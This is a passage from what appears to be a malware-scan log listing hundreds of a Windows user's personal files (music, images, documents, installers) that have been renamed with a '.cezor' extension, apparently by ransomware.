    2019-07-09 15:36 - 2018-12-09 22:10 - 008131611 _____ C:\Users\ADMIN\Downloads\EDEN - drugs (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-12-09 22:10 - 005588747 _____ C:\Users\ADMIN\Downloads\EDEN - crash (lyric video).mp3.cezor
    2019-07-09 15:36 - 2018-12-09 21:02 - 000075218 _____ C:\Users\ADMIN\Downloads\red_rudolf_reindeer_christmas_jumper.png.cezor
    2019-07-09 15:36 - 2018-12-09 21:00 - 000045088 _____ C:\Users\ADMIN\Downloads\download (40).png.cezor
    2019-07-09 15:36 - 2018-12-09 20:57 - 000009473 _____ C:\Users\ADMIN\Downloads\09f6c2df9809fba3d9056caeeb548664.jpg.cezor
    2019-07-09 15:36 - 2018-12-09 20:56 - 000272282 _____ C:\Users\ADMIN\Downloads\miyaya.png.cezor
    2019-07-09 15:36 - 2018-12-09 20:49 - 000480390 _____ C:\Users\ADMIN\Downloads\miya.png.cezor
    2019-07-09 15:36 - 2018-12-08 19:04 - 000366772 _____ C:\Users\ADMIN\Downloads\joohe.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 19:01 - 000035506 _____ C:\Users\ADMIN\Downloads\jooh.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 18:01 - 000076797 _____ C:\Users\ADMIN\Downloads\original.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:50 - 000364823 _____ C:\Users\ADMIN\Downloads\DR4FXgXW4AISbbd.jpg_large.cezor
    2019-07-09 15:36 - 2018-12-08 14:50 - 000204051 _____ C:\Users\ADMIN\Downloads\chris.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:47 - 000058673 _____ C:\Users\ADMIN\Downloads\christmas-aesthetic-background-resume-552-best-trees-images-on-pinterest-merry-love.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:46 - 000113390 _____ C:\Users\ADMIN\Downloads\chrisjeno.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 21:55 - 000188128 _____ C:\Users\ADMIN\Downloads\MEME.png.cezor
    2019-07-09 15:36 - 2018-12-07 17:56 - 000272952 _____ C:\Users\ADMIN\Documents\marki.docx.cezor
    2019-07-09 15:36 - 2018-12-07 17:56 - 000076358 _____ C:\Users\ADMIN\Downloads\marku.png.cezor
    2019-07-09 15:36 - 2018-12-07 17:52 - 000040477 _____ C:\Users\ADMIN\Downloads\mark3.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:51 - 000043478 _____ C:\Users\ADMIN\Downloads\mark2.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:50 - 000036533 _____ C:\Users\ADMIN\Downloads\mark1.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:45 - 000105804 _____ C:\Users\ADMIN\Downloads\marko.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 13:50 - 000192595 _____ C:\Users\ADMIN\Downloads\download (39).png.cezor
    2019-07-09 15:36 - 2018-12-07 13:49 - 000300342 _____ C:\Users\ADMIN\Documents\taey0ng.docx.cezor
    2019-07-09 15:36 - 2018-12-07 13:37 - 000072053 _____ C:\Users\ADMIN\Downloads\46c707557d2fda970ee4f6432be223fa.jpg.cezor
    2019-07-09 15:36 - 2018-12-06 22:51 - 000031717 _____ C:\Users\ADMIN\Documents\wonhoo.docx.cezor
    2019-07-09 15:36 - 2018-12-06 22:44 - 000089177 _____ C:\Users\ADMIN\Downloads\DtiUCAaUUAAtmES.jpg.cezor
    2019-07-09 15:36 - 2018-12-01 23:08 - 005078419 _____ C:\Users\ADMIN\Downloads\MONSTA X 몬스타엑스 'Shoot Out' MV.mp3.cezor
    2019-07-09 15:36 - 2018-12-01 23:04 - 000252153 _____ C:\Users\ADMIN\Downloads\Ill Be Your Man.pdf.cezor
    2019-07-09 15:36 - 2018-12-01 23:04 - 000139384 _____ C:\Users\ADMIN\Downloads\Ill Be Your Man.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000674639 _____ C:\Users\ADMIN\Downloads\Mint and Poppy.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000227460 _____ C:\Users\ADMIN\Downloads\lets make a deal lets make.pdf.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000121617 _____ C:\Users\ADMIN\Downloads\lets make a deal lets make.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:13 - 001000182 _____ C:\Users\ADMIN\Downloads\Mint and Poppy.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 21:37 - 000056816 _____ C:\Users\ADMIN\Downloads\as the river belongs to the.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 21:37 - 000018327 _____ C:\Users\ADMIN\Downloads\as the river belongs to the.txt.cezor
    2019-07-09 15:36 - 2018-11-26 13:29 - 000264122 _____ C:\Users\ADMIN\Downloads\No Mum He Really Is My Boyfriend.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 13:29 - 000159089 _____ C:\Users\ADMIN\Downloads\No Mum He Really Is My Boyfriend.txt.cezor
    2019-07-09 15:36 - 2018-11-25 21:22 - 000264122 _____ C:\Users\ADMIN\Downloads\fic.pdf.cezor
    2019-07-09 15:36 - 2018-11-24 23:08 - 005409442 _____ C:\Users\ADMIN\Downloads\NCT 127 엔시티 127 'Simon Says' MV.mp3.cezor
    2019-07-09 15:36 - 2018-11-24 23:07 - 000208242 _____ C:\Users\ADMIN\Downloads\A Cure For Nightmares podfic.txt.cezor
    2019-07-09 15:36 - 2018-11-24 23:07 - 000115054 _____ C:\Users\ADMIN\Downloads\A Lie Gets Halfway Around.txt.cezor
    2019-07-09 15:36 - 2018-11-24 23:06 - 000359587 _____ C:\Users\ADMIN\Downloads\A Cure For Nightmares podfic.pdf.cezor
    2019-07-09 15:36 - 2018-11-24 23:06 - 000217096 _____ C:\Users\ADMIN\Downloads\A Lie Gets Halfway Around.pdf.cezor
    2019-07-09 15:36 - 2018-11-23 21:49 - 000300036 _____ C:\Users\ADMIN\Downloads\Long Live Living If Living.txt.cezor
    2019-07-09 15:36 - 2018-11-23 21:48 - 000480680 _____ C:\Users\ADMIN\Downloads\Long Live Living If Living.pdf.cezor
    2019-07-09 15:36 - 2018-11-22 22:36 - 005965537 _____ C:\Users\ADMIN\Downloads\Fall Out Boy - Uma Thurman.mp3.cezor
    2019-07-09 15:36 - 2018-11-22 22:35 - 005647679 _____ C:\Users\ADMIN\Downloads\LEGENDS NEVER DIE LYRICS LEAGUE OF LEGENDS.mp3.cezor
    2019-07-09 15:36 - 2018-11-21 21:27 - 006709086 _____ C:\Users\ADMIN\Downloads\EDEN - Wake Up.mp3.cezor
    2019-07-09 15:36 - 2018-11-20 22:51 - 001765320 _____ C:\Users\ADMIN\Downloads\Harry Potter and the Cursed.txt.cezor
    2019-07-09 15:36 - 2018-11-20 22:50 - 004795669 _____ C:\Users\ADMIN\Downloads\One Direction - They Don't Know About Us (Lyrics On Screen).mp3.cezor
    2019-07-09 15:36 - 2018-11-20 22:50 - 002554226 _____ C:\Users\ADMIN\Downloads\Harry Potter and the Cursed.pdf.cezor
    2019-07-09 15:36 - 2018-11-17 20:41 - 070728660 _____ C:\Users\ADMIN\Downloads\IGdm-Setup-2.5.4.exe.cezor
    2019-07-09 15:36 - 2018-11-14 12:52 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123 (2).exe.cezor
    2019-07-09 15:36 - 2018-11-14 12:40 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123 (1).exe.cezor
    2019-07-09 15:36 - 2018-11-12 22:37 - 000631593 _____ C:\Users\ADMIN\Downloads\All About Chemistry.pdf.cezor
    2019-07-09 15:36 - 2018-11-12 22:37 - 000419994 _____ C:\Users\ADMIN\Downloads\All About Chemistry.txt.cezor
    2019-07-09 15:36 - 2018-11-12 22:35 - 004866513 _____ C:\Users\ADMIN\Downloads\Ariana Grande - breathin.mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:30 - 004719183 _____ C:\Users\ADMIN\Downloads\Panic! At The Disco High Hopes [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 004979989 _____ C:\Users\ADMIN\Downloads\Ariana Grande - thank u, next (lyric video).mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 000120323 _____ C:\Users\ADMIN\Downloads\Ill Always Protect You.pdf.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 000057901 _____ C:\Users\ADMIN\Downloads\Ill Always Protect You.txt.cezor
    2019-07-09 15:36 - 2018-11-06 15:37 - 457239062 _____ C:\Users\ADMIN\Downloads\BlueStacks-Installer_amd64_BS4_native_57d16fd0ed31e7b6abb5967f035ba87b.exe.cezor
    2019-07-09 15:36 - 2018-11-02 17:51 - 000102838 _____ C:\Users\ADMIN\Downloads\CU_EWVgWcAEBpxS.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 17:51 - 000025065 _____ C:\Users\ADMIN\Downloads\CU_EWNKWIAQnES5.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:51 - 000046541 _____ C:\Users\ADMIN\Downloads\41809117_170329003883724_2850388216022827008_n.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:51 - 000037779 _____ C:\Users\ADMIN\Downloads\41696713_272479723384215_1153248952913494016_n.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:24 - 000065614 _____ C:\Users\ADMIN\Downloads\Pokemon Black - Special Palace Edition 1 by MB Hacks (Red Hack) Goomba V2.2.sav.cezor
    2019-07-09 15:36 - 2018-10-29 21:53 - 000318044 _____ C:\Users\ADMIN\Downloads\Professional Couple Only.pdf.cezor
    2019-07-09 15:36 - 2018-10-29 21:53 - 000214103 _____ C:\Users\ADMIN\Downloads\Professional Couple Only.txt.cezor
    2019-07-09 15:36 - 2018-10-28 17:56 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123.exe.cezor
    2019-07-09 15:36 - 2018-10-28 17:29 - 002488742 _____ C:\Users\ADMIN\Downloads\PokemonEmeraldVersion_4058881702.exe.cezor
    2019-07-09 15:36 - 2018-10-28 11:31 - 000485142 _____ C:\Users\ADMIN\Downloads\Gravitys Got Nothing on You.txt.cezor
    2019-07-09 15:36 - 2018-10-28 11:31 - 000077020 _____ C:\Users\ADMIN\Downloads\Darling It Is No Joke.txt.cezor
    2019-07-09 15:36 - 2018-10-28 11:30 - 000764724 _____ C:\Users\ADMIN\Downloads\Gravitys Got Nothing on You.pdf.cezor
    2019-07-09 15:36 - 2018-10-28 11:30 - 000129949 _____ C:\Users\ADMIN\Downloads\Darling It Is No Joke.pdf.cezor
    2019-07-09 15:36 - 2018-10-22 17:28 - 000069538 _____ C:\Users\ADMIN\Downloads\download (38).png.cezor
    2019-07-09 15:36 - 2018-10-22 17:26 - 000774012 _____ C:\Users\ADMIN\Documents\oof.docx.cezor
    2019-07-09 15:36 - 2018-10-22 17:26 - 000301736 _____ C:\Users\ADMIN\Downloads\download (37).png.cezor
    2019-07-09 15:36 - 2018-10-22 17:25 - 000087554 _____ C:\Users\ADMIN\Downloads\download (36).png.cezor
    2019-07-09 15:36 - 2018-10-22 16:59 - 000358036 _____ C:\Users\ADMIN\Downloads\oof.png.cezor
    2019-07-09 15:36 - 2018-10-21 19:50 - 003451793 _____ C:\Users\ADMIN\Downloads\shoes.jpg.cezor
    2019-07-09 15:36 - 2018-10-21 18:45 - 004179388 _____ C:\Users\ADMIN\Downloads\benny blanco, Halsey & Khalid Eastside (official video).mp3.cezor
    2019-07-09 15:36 - 2018-10-21 18:36 - 005698461 _____ C:\Users\ADMIN\Downloads\Silk City, Dua Lipa - Electricity (Lyrics) ft. Diplo, Mark Ronson.mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:39 - 004576241 _____ C:\Users\ADMIN\Downloads\NCT 127 (엔시티 127) - 'TOUCH' Lyrics [Color CodedHanRomEng].mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:36 - 004542387 _____ C:\Users\ADMIN\Downloads\Dua Lipa BLACKPINK - Kiss and Make Up (Official Audio).mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:35 - 005252082 _____ C:\Users\ADMIN\Downloads\NCT 127 - REGULAR (레귤러) (Korean Ver.) Lyrics [Color Coded_Han_Rom_Eng].mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:34 - 000050223 _____ C:\Users\ADMIN\Downloads\ekek.txt.cezor
    2019-07-09 15:36 - 2018-10-19 22:33 - 000103567 _____ C:\Users\ADMIN\Downloads\ekek.pdf.cezor
    2019-07-09 15:36 - 2018-10-16 19:16 - 000037068 _____ C:\Users\ADMIN\Downloads\dark-transparent-tumblr-3.png.cezor
    2019-07-09 15:36 - 2018-10-16 17:37 - 000018063 _____ C:\Users\ADMIN\Downloads\image-2018-10-16 (1).jpg.cezor
    2019-07-09 15:36 - 2018-10-16 17:35 - 000078779 _____ C:\Users\ADMIN\Downloads\image-2018-10-16.jpg.cezor
    2019-07-09 15:36 - 2018-10-16 17:33 - 000051434 _____ C:\Users\ADMIN\Downloads\download (35).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:30 - 000048047 _____ C:\Users\ADMIN\Downloads\download (34).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:27 - 000047075 _____ C:\Users\ADMIN\Downloads\download (33).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:27 - 000045758 _____ C:\Users\ADMIN\Downloads\download (32).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:22 - 000032362 _____ C:\Users\ADMIN\Downloads\purepng.com-witch-hatwitchwitchcraftmagicbewitchingspell-1701527831890g6jfv.png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000199304 _____ C:\Users\ADMIN\Downloads\download (31).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000199304 _____ C:\Users\ADMIN\Downloads\download (30).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000116632 _____ C:\Users\ADMIN\Documents\ok.docx.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000045758 _____ C:\Users\ADMIN\Downloads\download (29).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:05 - 000076334 _____ C:\Users\ADMIN\Documents\spoopy.docx.cezor
    2019-07-09 15:36 - 2018-10-16 17:05 - 000045758 _____ C:\Users\ADMIN\Downloads\download (28).png.cezor
    2019-07-09 15:36 - 2018-10-16 16:45 - 000002754 _____ C:\Users\ADMIN\Downloads\627642-200.png.cezor
    2019-07-09 15:36 - 2018-10-16 16:44 - 000020421 _____ C:\Users\ADMIN\Downloads\original.gif.cezor
    2019-07-09 15:36 - 2018-10-15 16:55 - 000026131 _____ C:\Users\ADMIN\Documents\cuo.docx.cezor
    2019-07-09 15:36 - 2018-10-15 16:55 - 000021940 _____ C:\Users\ADMIN\Downloads\download (27).png.cezor
    2019-07-09 15:36 - 2018-10-15 16:52 - 000013968 _____ C:\Users\ADMIN\Downloads\download (26).png.cezor
    2019-07-09 15:36 - 2018-10-15 16:45 - 000146358 _____ C:\Users\ADMIN\Downloads\253747809015212.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:45 - 000069004 _____ C:\Users\ADMIN\Downloads\cat-ears-and-whiskers-clipart.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:44 - 000018211 _____ C:\Users\ADMIN\Downloads\cutie.jpeg.cezor
    2019-07-09 15:36 - 2018-10-15 16:41 - 000188474 _____ C:\Users\ADMIN\Downloads\cute.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:27 - 001759657 _____ C:\Users\ADMIN\Downloads\jaemin pics (@najaeminpics) _ Twitter.html.cezor
    2019-07-09 15:36 - 2018-10-13 23:44 - 000105903 _____ C:\Users\ADMIN\Downloads\ok (1).jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:42 - 000039916 _____ C:\Users\ADMIN\Downloads\ok.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:41 - 000059265 _____ C:\Users\ADMIN\Downloads\468489c32e51ccb534a439c7817d12f7.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:38 - 000282916 _____ C:\Users\ADMIN\Downloads\572693.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:37 - 000197836 _____ C:\Users\ADMIN\Downloads\large (1).png.cezor
    2019-07-09 15:36 - 2018-10-13 23:36 - 000041708 _____ C:\Users\ADMIN\Downloads\40553416_1845789622184411_5578044573709753109_n.jpg.cezor
    2019-07-09 15:36 - 2018-10-10 22:02 - 000661044 _____ C:\Users\ADMIN\Downloads\A Musical Matchmaking.txt.cezor
    2019-07-09 15:36 - 2018-10-10 22:00 - 001756394 _____ C:\Users\ADMIN\Downloads\A Musical Matchmaking.pdf.cezor
    2019-07-09 15:36 - 2018-10-05 21:47 - 007255224 _____ C:\Users\ADMIN\Downloads\NCT Dream (엔시티 드림) - 'GO' Lyrics [Color CodedHanRomEng].mp4.cezor
    2019-07-09 15:36 - 2018-10-05 21:46 - 005361795 _____ C:\Users\ADMIN\Downloads\Clean Bandit - Solo feat. Demi Lovato [Official Video].mp3.cezor
    2019-07-09 15:36 - 2018-10-05 21:46 - 004957420 _____ C:\Users\ADMIN\Downloads\NCT Dream (엔시티 드림) - 'GO' Lyrics [Color CodedHanRomEng].mp3.cezor
    2019-07-09 15:36 - 2018-10-02 13:14 - 006940094 _____ C:\Users\ADMIN\Downloads\akali 2.jpg.cezor
    2019-07-09 15:36 - 2018-10-02 13:09 - 000044340 _____ C:\Users\ADMIN\Downloads\akali.jpg.cezor
    2019-07-09 15:36 - 2018-09-29 19:04 - 005076539 _____ C:\Users\ADMIN\Downloads\NCT U_WITHOUT YOU_Music Video.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:03 - 005267128 _____ C:\Users\ADMIN\Downloads\NCT U 엔시티 유 일곱 번째 감각 (The 7th Sense) Performance Video.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:02 - 005649561 _____ C:\Users\ADMIN\Downloads\NCT 127 (엔씨티 127) - Back 2 U (AM 0127) Colour Coded Lyrics (HanRomEng).mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:01 - 003813257 _____ C:\Users\ADMIN\Downloads\NCT 127 - Baby Dont Like It Lyrics [HANROMENG] + Color Coded.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 19:00 - 004841437 _____ C:\Users\ADMIN\Downloads\NCT 127 - Whiplash Lyrics [HANROMENG] + Color Coded.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:59 - 004930462 _____ C:\Users\ADMIN\Downloads\NCT 2018 엔시티 2018 Black on Black MV (Performance Ver.).mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:59 - 004751785 _____ C:\Users\ADMIN\Downloads\NCT DREAM (엔씨티 드림) - Drippin’ (드리핑) Color Coded HanRomEng Lyrics.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:58 - 004449600 _____ C:\Users\ADMIN\Downloads\NCT DREAM 엔시티 드림 We Go Up MV.mp3.cezor
    2019-07-09 15:36 - 2018-09-29 18:57 - 004529221 _____ C:\Users\ADMIN\Downloads\NCT U 엔시티 유 Baby Dont Stop MV.mp3.cezor
    2019-07-09 15:36 - 2018-09-19 18:33 - 000176368 _____ C:\Users\ADMIN\Downloads\paper-lantern-festival-Florence.jpg.cezor
    2019-07-09 15:36 - 2018-09-19 18:30 - 000976809 _____ C:\Users\ADMIN\Downloads\NaughtyAffectionateAfricanharrierhawk-size_restricted.gif.cezor
    2019-07-09 15:36 - 2018-09-19 18:29 - 000048140 _____ C:\Users\ADMIN\Downloads\19120387_317071188730508_4209958283915558912_n.jpg.cezor
    2019-07-09 15:36 - 2018-09-19 18:24 - 000449632 _____ C:\Users\ADMIN\Downloads\download (25).png.cezor
    2019-07-09 15:36 - 2018-09-19 18:20 - 000422555 _____ C:\Users\ADMIN\Downloads\Bakugou.Katsuki.full.2131175.jpg.cezor
    2019-07-09 15:36 - 2018-09-15 15:21 - 001613150 _____ C:\Users\ADMIN\Downloads\attachments.zip.cezor
    2019-07-09 15:36 - 2018-09-15 15:21 - 001613150 _____ C:\Users\ADMIN\Downloads\attachments (1).zip.cezor
    2019-07-09 15:36 - 2018-09-12 12:14 - 070737139 _____ C:\Users\ADMIN\Downloads\IGdm-Setup-2.5.2.exe.cezor
    2019-07-09 15:36 - 2018-09-05 11:59 - 000520270 _____ C:\Users\ADMIN\Downloads\psychology-supp-reading-mat-xi.doc.cezor
    2019-07-09 15:36 - 2018-08-30 14:47 - 000027874 _____ C:\Users\ADMIN\Downloads\rbxfpsunlocker-1.5.zip.cezor
    2019-07-09 15:36 - 2018-08-30 14:44 - 000027617 _____ C:\Users\ADMIN\Downloads\rbxfpsunlocker-master.zip.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005799399 _____ C:\Users\ADMIN\Documents\Nightcore - Clarity.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005656457 _____ C:\Users\ADMIN\Documents\Maroon 5 - Girls Like You (Lyrics) ft. Cardi B.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005601287 _____ C:\Users\ADMIN\Documents\Troye Sivan - Dance To This (Official Audio) ft. Ariana Grande.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005450194 _____ C:\Users\ADMIN\Documents\Nightcore - Counting Stars.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005417594 _____ C:\Users\ADMIN\Documents\Troye Sivan - Bloom (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005312268 _____ C:\Users\ADMIN\Documents\Touch - Troye Sivan (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 005090958 _____ C:\Users\ADMIN\Documents\BTS (방탄소년단) LOVE YOURSELF 轉 Tear Singularity Comeback Trailer.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004685329 _____ C:\Users\ADMIN\Documents\Nightcore - Rather Be.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004682821 _____ C:\Users\ADMIN\Documents\Nightcore - Centuries.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004630158 _____ C:\Users\ADMIN\Documents\Nightcore - Angel With A Shotgun.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004424522 _____ C:\Users\ADMIN\Documents\Nightcore - Stereo heart.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 004100395 _____ C:\Users\ADMIN\Documents\Nightcore - Hall of Fame.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003902282 _____ C:\Users\ADMIN\Documents\Nightcore - Symphony - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003615771 _____ C:\Users\ADMIN\Documents\Nightcore - Im Not Her - (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 003372328 _____ C:\Users\ADMIN\Documents\BTS - I NEED U (Official Instrumental) +Karaoke.mp3.cezor
    2019-07-09 15:36 - 2018-08-21 22:08 - 002159393 _____ C:\Users\ADMIN\Documents\My Hero Academia Season 3 – Opening Theme.mp3.cezor
    2019-07-09 15:36 - 2018-08-17 20:38 - 002446566 _____ C:\Users\ADMIN\Downloads\amazing.png.cezor
    2019-07-09 15:36 - 2018-08-17 13:04 - 184170574 _____ C:\Users\ADMIN\Downloads\nightcore havana despacito believer shape of you rockabye and more (switching vocal).mpeg.cezor
    2019-07-09 15:36 - 2018-08-11 23:39 - 000036418 _____ C:\Users\ADMIN\Downloads\large (2).jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:39 - 000018327 _____ C:\Users\ADMIN\Downloads\7c8403577d127a3ce33376d751ef318df190a1de_hq.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:33 - 000715638 _____ C:\Users\ADMIN\Downloads\dangan_ronpa_icons_by_crescentmarionette-d6n2lqt.png.cezor
    2019-07-09 15:36 - 2018-08-11 23:33 - 000691144 _____ C:\Users\ADMIN\Downloads\c0c.png.cezor
    2019-07-09 15:36 - 2018-08-11 23:32 - 000346448 _____ C:\Users\ADMIN\Downloads\junko_enoshima_dangan_ronpa_by_0kasane0-d6urram.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:30 - 000063189 _____ C:\Users\ADMIN\Downloads\C7ytx7nWkAEwzS1.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:19 - 000035129 _____ C:\Users\ADMIN\Downloads\6546cb72b6516fd307c141c0624517d9.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:18 - 000051597 _____ C:\Users\ADMIN\Downloads\92ca9da82e5223a0ca12654312ba8d4c--avatar-couple.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:18 - 000045010 _____ C:\Users\ADMIN\Downloads\3ed11f93e152079016e7aaef47ae2cd2.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:16 - 000034479 _____ C:\Users\ADMIN\Downloads\275b239b226fbe16d0c45634a5cc0f28.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:16 - 000032412 _____ C:\Users\ADMIN\Downloads\ad2240290ad6aeff1ac9e0d2f7527b40.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:02 - 000033899 _____ C:\Users\ADMIN\Downloads\large (1).jpg.cezor
    2019-07-09 15:36 - 2018-08-11 23:02 - 000032335 _____ C:\Users\ADMIN\Downloads\large.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:59 - 000040172 _____ C:\Users\ADMIN\Downloads\d90ee3a5f3a2aac1bcb067be427178e9.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:59 - 000034339 _____ C:\Users\ADMIN\Downloads\d49f626d64a0e038cf5d238110a54eef.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:58 - 000026139 _____ C:\Users\ADMIN\Downloads\78b24a6ce4bc55359906f360b6a9e27e.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:58 - 000019271 _____ C:\Users\ADMIN\Downloads\ce62c3803839bb5ac5565a1223ed1ccd.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:48 - 000038025 _____ C:\Users\ADMIN\Downloads\889993b50ee2b292addd9fe3adfe3d18.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000052270 _____ C:\Users\ADMIN\Downloads\99b856213914717b296f0bc6bc13646f.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000051158 _____ C:\Users\ADMIN\Downloads\618f09b71d7d0fe40dedb2b11bbd1605.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000045971 _____ C:\Users\ADMIN\Downloads\1a2b491be5aef55a84795549d537067a.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:47 - 000044028 _____ C:\Users\ADMIN\Downloads\f144ccc45b303b4c6cde273186490a6b.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:43 - 000078871 _____ C:\Users\ADMIN\Downloads\80b0c202e95175d928147e79659f5842.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 22:42 - 000069178 _____ C:\Users\ADMIN\Downloads\0a2af99df78b5b46815fe3ccbd5ed5bb.jpg.cezor
    2019-07-09 15:36 - 2018-08-11 18:51 - 055825658 _____ C:\Users\ADMIN\Downloads\BTS (방탄소년단) DNA Official MV.avi.cezor
    2019-07-09 15:36 - 2018-08-11 18:50 - 000157273 _____ C:\Users\ADMIN\Downloads\giphy.gif.cezor
    2019-07-09 15:36 - 2018-08-05 21:04 - 000048016 _____ C:\Users\ADMIN\Downloads\download (24).png.cezor
    2019-07-09 15:36 - 2018-08-03 18:13 - 004873411 _____ C:\Users\ADMIN\Downloads\(G)I-DLE (여자아이들) - LATATA (라타타) Lyrics [Color Coded_Han_Rom_Eng].mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:12 - 005656457 _____ C:\Users\ADMIN\Downloads\Maroon 5 - Girls Like You (Lyrics) ft. Cardi B.mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:10 - 002159393 _____ C:\Users\ADMIN\Downloads\My Hero Academia Season 3 – Opening Theme.mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:09 - 005461479 _____ C:\Users\ADMIN\Downloads\Ariana Grande ft. Nicki Minaj - Side To Side (Lyrics).mp3.cezor
    2019-07-09 15:36 - 2018-08-03 18:09 - 004926074 _____ C:\Users\ADMIN\Downloads\Ariana Grande - God is a woman (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000121931 _____ C:\Users\ADMIN\Downloads\download (22).png.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000116146 _____ C:\Users\ADMIN\Downloads\download (21).png.cezor
    2019-07-09 15:36 - 2018-08-03 15:30 - 000064617 _____ C:\Users\ADMIN\Downloads\download (23).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:18 - 000787568 _____ C:\Users\ADMIN\Downloads\download (20).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:12 - 000149852 _____ C:\Users\ADMIN\Downloads\download (19).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:08 - 000260880 _____ C:\Users\ADMIN\Downloads\download (18).png.cezor
    2019-07-09 15:36 - 2018-07-30 15:06 - 000486370 _____ C:\Users\ADMIN\Documents\lay.docx.cezor
    2019-07-09 15:36 - 2018-07-30 15:06 - 000154118 _____ C:\Users\ADMIN\Downloads\download (17).png.cezor
